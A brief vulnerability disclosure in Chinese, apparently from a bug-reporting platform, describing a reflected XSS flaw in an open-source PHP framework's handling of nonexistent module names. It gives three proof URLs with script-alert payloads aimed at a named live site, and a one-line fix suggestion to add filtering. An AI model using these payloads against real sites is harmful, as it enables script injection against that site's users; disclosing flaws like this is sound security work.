簡要描述:開源php開發框架默認存在xss漏洞,導致所有使用該框架開發的系統都存在xss漏洞
詳細說明:對不不存在的模塊處理錯誤不當,導致xss漏洞
漏洞證明:
以超級巡警測試
http://i.sucop.com/?m='"><script>alert(3);</script><"&a=login
http://i.sucop.com/index.php?m='"><script>alert(0214559);</script><"&a=help&
http://i.sucop.com/index.php?m='"><script>alert(0214559);</script><"&a=help&
去看看
修復方案:設置好過濾吧~~~